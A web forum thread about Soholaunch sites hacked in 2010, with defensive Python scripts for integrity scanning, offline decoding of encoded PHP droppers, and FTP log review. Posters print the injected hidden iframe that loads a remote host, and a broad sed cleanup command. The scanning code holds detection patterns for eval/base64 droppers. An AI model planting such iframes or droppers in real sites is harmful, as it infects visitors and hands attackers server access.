
"Trojan Horse"


34 replies to this topic

#1 lwyau (a soho enthusiast; Moderators, 5,605 posts)

Posted 13 April 2007 - 05:24 PM

Two of my clients told me that their customers told them that their websites were "having trojan horse". Presumably the end users' anti-virus software was alerting them when accessing either site. Both are, of course, solo sites.

The thing is that I cannot see any such alert on my computers (Windows XP with McAfee anti-virus), and running sohoscan.php did not reveal any problems, either.

Has anyone else encountered this?

#2 ianc13 (Member; Members, 11 posts)

Posted 14 April 2007 - 11:40 PM

I have found amongst my friends and clients that it all depends on what virus protection program you use, and how often it is updated. I use Norton Corporate on 2 of my PCs and AVG Free Edition on the others. Both these programs pick up different things, and also falsely detect Trojans when they are actually cookies with a refresh function on them (i.e. shopping cart cookies). I would ask your clients for more information on what was found and what program found it; possibly it was even a spyware checker program and the problem is a temp directory related one. Of course it is possible that someone has placed trojan redirect code through the site, but unlikely if your scan did not pick it up.
- ianc13 - Aus Health Info

#3 george (Advanced Member; Members, 36 posts)

Posted 15 April 2007 - 10:44 PM

It's the helpmehelpyou.php file that is probably being detected.

It's been reported as setting off anti-virus programs, but I believe it is still being included in the builds...

George Callaghan


#4 DrJon (I was never confused....; Moderators, 857 posts)

Posted 11 June 2010 - 11:21 AM

I know this thread is pretty old, but one of my clients is having the same trouble and it's happened twice now.
On every page is this:

<body>
<iframe src="http://googlestat.org/stat/go.php?sid=1" width="0" height="0" frameborder="0"></iframe>
</body>

(The first time it was a different url in the iframe)

I've traced the source of this code to shared_functions.php where it appeared once at the beginning of the regular php code, before the 'proper code' begins, and today it appears after the last ?>

I double checked the .htaccess file against another unhacked site and found a distinct difference, i.e. it was almost non-existent, so I uploaded a modified version of that to the hacked site.

Now... my question is: where is this vulnerability occurring? Any ideas peeps?
The supreme irony of life is that hardly anyone gets out of it alive. - Robert A. Heinlein
Soho, Wordpress, Drupal, Joomla, etc Template & Web Design - Data Recovery

#5 dresswell (Soho Dog; Administrators, 3,417 posts; Location: U.S.A.)

Posted 11 June 2010 - 12:36 PM

Hi DrJon,
We missed you around here.

I found the same thing on a site today for someone I'm helping here.
I have not figured out yet how they got there.
dresswell

Free Soholaunch Hosting
Soholaunch Pro or Soholaunch Ultra Free with Hosting.
Check out our Soholaunch hosting if you've tried others and were disappointed with your host or their support.
Get the help you need to build your website today.
Now offering a 99-cent first-month trial offer.
Easy Website Maker


#6 busi6292 (Senior Member; Members, 137 posts)

Posted 11 June 2010 - 02:11 PM

I too have got the same problem and Soholaunch don't seem to want to be made aware of the problem unless I pay for support.

Can you let me know where the shared_functions.php file is please so I can temporarily fix the problem. I will have to switch my clients to a new CMS one by one asap with this major problem - it has resulted unfortunately in the sites being blacklisted now on Google.

If anyone knows where the vulnerability has occurred, I too would like to know please.

Thanks.

#7 Matt Wilcox (Senior Member; Moderators, 132 posts)

Posted 11 June 2010 - 02:37 PM

I can confirm two of my sites had the exact same thing. Look in the shared_functions.php file in sohoadmin/program/includes

Also, look for a photo.php or photos.php file in your media folder, it will be completely encoded.

What versions are you all running? I was running the latest on mine.

Are any of you using any plugins too? I have two different plugins both by the same company on both of my sites. Those were the similarities between the two.

#8 Matt Wilcox (Senior Member; Moderators, 132 posts)

Posted 11 June 2010 - 02:48 PM

One more thing that Mike Morrison at Soho sent me the other day - http://www.soholaunc...ia/sohoscan.zip

It's very useful.

#9 dresswell (Soho Dog; Administrators, 3,417 posts; Location: U.S.A.)

Posted 11 June 2010 - 03:57 PM

I have also seen these in the media folder:
Page.php, 404.php.
Looks like an eval(base64).

Here's how to remove it.
Got this from draknet.

Log in with SSH and run this command:

grep -rilF 'eval(base64_decode(' . | while IFS= read -r file; do sed -i.bak 's/eval(base64_decode(.*));//g' "$file"; done

It will strip out that line from any file that has it (including ones that should, so be careful using this).


#10 DrJon (I was never confused....; Moderators, 857 posts)

Posted 11 June 2010 - 04:15 PM

Problem with that one is that there seems to be many lines of code with the base64 encoding code......

I just downloaded the entire site locally and did a 'find in files' command to locate the offending code.

Still unsure of how the exploit works though - although I did find that in the shopping directory the email to friend php file had both the ownership entirely removed as well as having no permissions whatsoever. Tried chmodding it to no avail and had to remove it from server and upload a good version from another Soho site.

Could be just a coincidence.. who knows?

Anyone? :geek:

Edit: If they get listed on Google as blacklisted (as my client did) as soon as you clean up the site you can request that they do another scan of the site - you need an account --> webmaster tools...

I'd hang fire on using another CMS until you know how the exploit was carried out: if one piece of software can be hacked, then so might another.....

Edited by DrJon, 11 June 2010 - 04:27 PM.


#11 dresswell (Soho Dog; Administrators, 3,417 posts; Location: U.S.A.)

Posted 11 June 2010 - 04:41 PM

I have been using this for a few months now on a bunch of Soho sites.
What I do is run the installsoholaunch.php after the SSH command.
Seems to do the trick.

#12 DrJon (I was never confused....; Moderators, 857 posts)

Posted 11 June 2010 - 04:53 PM

I'm guessing that if you don't have the ability to log in with SSH, or are nervous about running command line instructions, then sohoscan.php -> delete these files -> installsoholaunch.php should achieve the same result.

#13 dresswell (Soho Dog; Administrators, 3,417 posts; Location: U.S.A.)

Posted 11 June 2010 - 05:06 PM

I have not tried it that way, but I would think it would work also.

#14 Matt Wilcox (Senior Member; Moderators, 132 posts)

Posted 11 June 2010 - 05:06 PM

I just use the sohoscan to do the dirty work for me, I only deleted files I knew weren't supposed to be there. I agree on the grep command, a lot of files use base64 and plugins do too. I wouldn't want someone to just go in and delete everything.

As for the email a friend file... this little bugger has been causing issues since day 1, but I'm pretty sure when I was reading about changes in one of the last revisions, Soho said they had pretty much fixed all the issues with it.

I'm tempted to write a plugin that just eliminates it. I never have it turned on for any of my clients' sites and ask them not to use it.
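
The posts above agree that a blind grep/sed over every eval(base64_decode( is risky because legitimate plugins are encoded the same way. The script below is an added example (it is not sohoscan.php and not code any poster shared) showing the review-first approach Matt describes: diff the live tree against a clean reference copy by SHA-256 so that added and modified files stand out, and report the line of each suspicious marker rather than deleting anything. The marker list, directory layout, file names and sample contents in demo() are all constructed for this example.

```python
"""Review-first integrity scan for a hacked Soholaunch tree.

Added example; it is not sohoscan.php and not code posted in this thread.
Instead of stripping every eval(base64_decode( with sed (which also hits
legitimate obfuscated plugin files), it (1) diffs the live site against a clean
reference copy by SHA-256 and (2) reports the line of each suspicious marker,
so each hit can be reviewed before anything is deleted. The directory names
and sample file contents in demo() are constructed for this example.
"""
import hashlib
import os
import re
import tempfile
from pathlib import Path

# Markers discussed in the thread plus the zero-size iframe pattern (assumed list).
MARKERS = {
    "eval(base64_decode(": re.compile(rb"eval\s*\(\s*base64_decode\s*\("),
    "eval(gzinflate(": re.compile(rb"eval\s*\(\s*gzinflate\s*\("),
    "hidden iframe": re.compile(
        rb"<iframe\b[^>]*\b(?:width|height)\s*=\s*[\"']?0\b", re.I),
}
SCAN_SUFFIXES = {".php", ".html", ".htm", ".js"}


def sha256_file(path):
    h = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def tree_hashes(root):
    """Relative path -> SHA-256 for every regular file under root."""
    return {str(p.relative_to(root)).replace(os.sep, "/"): sha256_file(p)
            for p in sorted(root.rglob("*")) if p.is_file()}


def marker_hits(path):
    """(line number, marker name) for every marker found in the file."""
    hits = []
    for lineno, line in enumerate(path.read_bytes().splitlines(), 1):
        for name, rx in MARKERS.items():
            if rx.search(line):
                hits.append((lineno, name))
    return hits


def scan(reference, site):
    """Files added or changed relative to the clean copy, plus marker hits.

    A marker in an unchanged file (e.g. an obfuscated but legitimate plugin)
    still shows up under 'markers' but not under 'modified' or 'added'.
    """
    ref, live = tree_hashes(reference), tree_hashes(site)
    report = {
        "added": sorted(set(live) - set(ref)),
        "modified": sorted(f for f in live if f in ref and live[f] != ref[f]),
        "markers": {},
    }
    for rel in live:
        p = site / rel
        if p.suffix in SCAN_SUFFIXES or p.name == ".htaccess":
            hits = marker_hits(p)
            if hits:
                report["markers"][rel] = hits
    return report


def demo():
    """Builds a constructed clean copy and a 'hacked' copy in a temp dir."""
    base = Path(tempfile.mkdtemp(prefix="sohoscan-demo-"))
    ref, live = base / "clean", base / "site"
    clean_func = "<?php\nfunction soho_header() { return 'ok'; }\n"
    files = {
        "sohoadmin/program/includes/shared_functions.php": clean_func,
        # legitimate but obfuscated plugin: a marker hit that must NOT be deleted
        "plugins/legit/loader.php": "<?php\neval(base64_decode('aGk='));\n",
    }
    for rel, body in files.items():
        for root in (ref, live):
            (root / rel).parent.mkdir(parents=True, exist_ok=True)
            (root / rel).write_text(body)
    # Injections mirroring the thread: an iframe appended after the closing ?>
    # and an encoded dropper in the media folder (the payload literal is a dummy).
    (live / "sohoadmin/program/includes/shared_functions.php").write_text(
        clean_func + "?>\n<iframe src=\"http://example.invalid/go.php\" "
        "width=\"0\" height=\"0\" frameborder=\"0\"></iframe>\n")
    (live / "media").mkdir()
    (live / "media/photo.php").write_text(
        "<?php eval(gzinflate(base64_decode('...'))); ?>\n")
    return scan(ref, live)


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

Run it against a real site as scan(Path("clean-install"), Path("public_html")); anything under "added" or "modified" that also carries a marker is the first thing to open, while a marker in an unchanged file is usually an encoded plugin and gets left alone.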

#15 busi6292 (Senior Member; Members, 137 posts)

Posted 11 June 2010 - 05:45 PM

Interesting to read everyone's replies.

I removed the code from the shared_functions.php file relating to that iframe. I also removed something called photo.php in the media folder which was base64 encoded. It's quite scary seeing someone else's user name and password in that file too. Does anyone know what all of this did or was supposed to do to the site? I assume it was an automated script that targeted multiple sites?

Thanks Dr Jon for the info, I will ask for a rescan of the site in Webmaster Tools - wasn't aware you could do that there.

#16 Mike Morrison (Administrator; Administrators, 10 posts)

Posted 11 June 2010 - 06:20 PM

Hey Everybody,

Two points to mention here...
1. There were some exploits in older builds, but we have corrected them. Make sure you're running the latest version (as of right now v4.9.3 r38+).

2. sohoscan.php is your best friend for investigating hacks...
http://www.soholaunc...ia/sohoscan.zip

Please let us know via support ticket if you've cleaned a site, updated to v4.9.3 r38+ and THEN get hacked again (pointing to an outstanding vulnerability).

#17 Matt Wilcox (Senior Member; Moderators, 132 posts)

Posted 11 June 2010 - 06:39 PM

I deleted my copies of the encoded script, but if someone has one saved, I can run it on my mac while it's not connected to a network and decode it to see if I can follow the code. PM me if you have a copy you want to send.

#18 kyle04 (Senior Member; Moderators, 411 posts)

Posted 15 June 2010 - 12:00 PM

Reminds me when I was hacked a while ago - the sohoscan.php script did identify eval(gzinflate(base64_decode( encoded scripts, which I removed as no Soho script is encoded this way. There were 2 or 3 of this type in a variety of locations (including image folders, shopping folder, template folders). Names to be wary of include:

ini.php
function.php
prod_cust_card.php
thumb.php

They were all remote ftp programmes - not a good thing to have in your site !

AndyP
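
Matt offered to decode a saved copy of the encoded script on an offline machine, and kyle04 notes the files used eval(gzinflate(base64_decode( wrappers. The script below is an added example (not code from the thread or from Soholaunch) that peels such wrapper chains statically: no PHP interpreter, nothing executed, so it is safe to run on a quarantined copy of photo.php or ini.php. It maps each PHP wrapper to the standard-library Python call that undoes it; build_sample() constructs a two-layer dropper around a harmless echo so the example runs without any real malware. The wrapper set is an assumption about what these droppers typically use; an unsupported function raises rather than guessing.

```python
"""Offline unwrapping of eval(gzinflate(base64_decode('...'))) droppers.

Added example, not code from the thread or from Soholaunch. It peels wrapper
layers statically, with no PHP interpreter and nothing executed, so a recovered
photo.php or ini.php can be read on a machine that is off the network. PHP
wrappers are mapped to their Python equivalents (all standard library):
  base64_decode -> base64.b64decode
  gzinflate     -> zlib.decompress(data, -15)      raw DEFLATE
  gzuncompress  -> zlib.decompress(data)           zlib stream
  gzdecode      -> zlib.decompress(data, 16 + 15)  gzip stream
  str_rot13     -> codecs rot_13
  strrev        -> byte reversal
build_sample() constructs a two-layer dropper around a harmless payload.
"""
import base64
import codecs
import re
import zlib

WRAPPERS = {
    "base64_decode": base64.b64decode,
    "gzinflate": lambda b: zlib.decompress(b, -15),
    "gzuncompress": zlib.decompress,
    "gzdecode": lambda b: zlib.decompress(b, 16 + 15),
    "str_rot13": lambda b: codecs.decode(b.decode("latin-1"), "rot_13").encode("latin-1"),
    "strrev": lambda b: b[::-1],
}

# eval( f1( f2( ... 'literal' ) ... ) );  group 1 = wrapper chain, group 3 = literal
CHAIN_RE = re.compile(
    r"eval\s*\(\s*((?:\w+\s*\(\s*)+)(['\"])([^'\"]*)\2\s*\)+\s*;?", re.S)


def peel_once(src):
    """Decode the first eval(...) chain in src; (None, []) when there is none."""
    m = CHAIN_RE.search(src)
    if m is None:
        return None, []
    chain = re.findall(r"\w+", m.group(1))          # outermost wrapper first
    data = m.group(3).encode("latin-1")
    for name in reversed(chain):                     # innermost is applied first
        if name not in WRAPPERS:
            raise ValueError("unsupported wrapper: %s" % name)
        data = WRAPPERS[name](data)
    return data.decode("latin-1"), chain


def unwrap(src, max_layers=20):
    """Peel layers until no eval chain remains; returns (source, list of chains)."""
    layers = []
    for _ in range(max_layers):
        inner, chain = peel_once(src)
        if inner is None:
            break
        layers.append(chain)
        src = inner
    return src, layers


def build_sample():
    """Constructed dropper: gzinflate(base64(...)) around base64(...) around an echo."""
    payload = "echo 'hello from the decoded script';"
    inner = "eval(base64_decode('%s'));" % base64.b64encode(payload.encode()).decode()
    deflater = zlib.compressobj(9, zlib.DEFLATED, -15)   # raw DEFLATE = PHP gzdeflate
    raw = deflater.compress(inner.encode()) + deflater.flush()
    return "<?php eval(gzinflate(base64_decode('%s'))); ?>" % base64.b64encode(raw).decode()


if __name__ == "__main__":
    source, chains = unwrap(build_sample())
    print(chains)
    print(source)
```

On a real sample, the last value returned by unwrap() is the plain PHP the attacker actually runs; that is where the FTP credentials busi6292 saw and any remote-upload logic will be readable.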

#19 DrJon (I was never confused....; Moderators, 857 posts)

Posted 21 June 2010 - 02:17 PM

Well... it's happened again to the same site - latest version, nothing untoward about the site at all, just a regular site.

The code was again attached to the end of the shared functions file so I've removed it and set the chmod to no write mode - we'll see if this makes a difference. :suspicious:

#20 draknet (Senior Member; Moderators, 828 posts)

Posted 21 June 2010 - 10:17 PM

Have you checked the FTP logs to see if anyone not recognized is getting in?

DrakNet Web Hosting | (Or just me: jenlepp.com | Twitter: @jenlepp)
Please note that DrakNet no longer offers licensed Soholaunch as of 9/1/2010 - if you are looking at an old forum post that recommends us as a Soholaunch host, please note that situation has changed since the post was made.
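
draknet's question is the right next step: busi6292 found an FTP user name and password inside the dropper, so a re-infection after a clean rebuild points at a stolen credential rather than a CMS bug. The script below is an added example (not code from the thread or from DrakNet) that reads FTP log lines, records which client addresses each account logged in from, and flags successful logins from addresses not on a known list plus every upload of a .php file. The log lines are a constructed sample in the style of vsftpd's log; the account name, addresses and "known" address list are assumptions, and LINE_RE would need adjusting for another server's format.

```python
"""FTP log review for logins that do not belong (stolen-credential check).

Added example, not code from the thread or from DrakNet. SAMPLE_LOG is a
constructed vsftpd-style excerpt; the account, addresses and KNOWN_IPS are
assumptions. Successful logins from unknown addresses and any .php upload
are reported so they can be matched against the injected files.
"""
import re
from collections import defaultdict

LINE_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} +\d+ [\d:]+ \d{4}) \[pid \d+\] \[(?P<user>[^\]]+)\] '
    r'(?P<result>OK|FAIL) (?P<event>LOGIN|UPLOAD|DELETE): Client "(?P<ip>[^"]+)"'
    r'(?:, "(?P<path>[^"]+)")?')

# Constructed sample: a normal morning session, then an afternoon session from a
# different address that drops photo.php and rewrites shared_functions.php.
SAMPLE_LOG = """\
Mon Jun 21 09:02:11 2010 [pid 1201] [soho_client] OK LOGIN: Client "203.0.113.10"
Mon Jun 21 09:03:40 2010 [pid 1201] [soho_client] OK UPLOAD: Client "203.0.113.10", "/public_html/media/logo.png", 8192 bytes, 40.00Kbyte/sec
Mon Jun 21 13:47:05 2010 [pid 1377] [soho_client] FAIL LOGIN: Client "198.51.100.77"
Mon Jun 21 13:47:09 2010 [pid 1377] [soho_client] OK LOGIN: Client "198.51.100.77"
Mon Jun 21 13:47:12 2010 [pid 1377] [soho_client] OK UPLOAD: Client "198.51.100.77", "/public_html/media/photo.php", 3112 bytes, 15.20Kbyte/sec
Mon Jun 21 13:47:13 2010 [pid 1377] [soho_client] OK UPLOAD: Client "198.51.100.77", "/public_html/sohoadmin/program/includes/shared_functions.php", 44120 bytes, 210.00Kbyte/sec
"""

# Assumed: the only address the client's staff use for FTP.
KNOWN_IPS = {"soho_client": {"203.0.113.10"}}


def review(log_text, known_ips):
    """Group logins by account and flag unknown sources and .php uploads."""
    ips_by_user = defaultdict(set)
    findings = {"unknown_logins": [], "failed_logins": [], "php_uploads": []}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                      # other record types are ignored here
        ts, user, ip = m["ts"], m["user"], m["ip"]
        if m["event"] == "LOGIN":
            if m["result"] == "FAIL":
                findings["failed_logins"].append((ts, user, ip))
                continue
            ips_by_user[user].add(ip)
            if ip not in known_ips.get(user, set()):
                findings["unknown_logins"].append((ts, user, ip))
        elif m["event"] == "UPLOAD" and m["result"] == "OK" \
                and m["path"].lower().endswith(".php"):
            findings["php_uploads"].append((ts, user, ip, m["path"]))
    findings["ips_by_user"] = {u: sorted(v) for u, v in ips_by_user.items()}
    return findings


if __name__ == "__main__":
    for key, value in review(SAMPLE_LOG, KNOWN_IPS).items():
        print(key, value)
```

If the unknown address lines up with the timestamps on the injected files, the fix is a password change on the FTP account (and on the machine whose saved credentials leaked), not another round of file cleaning.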




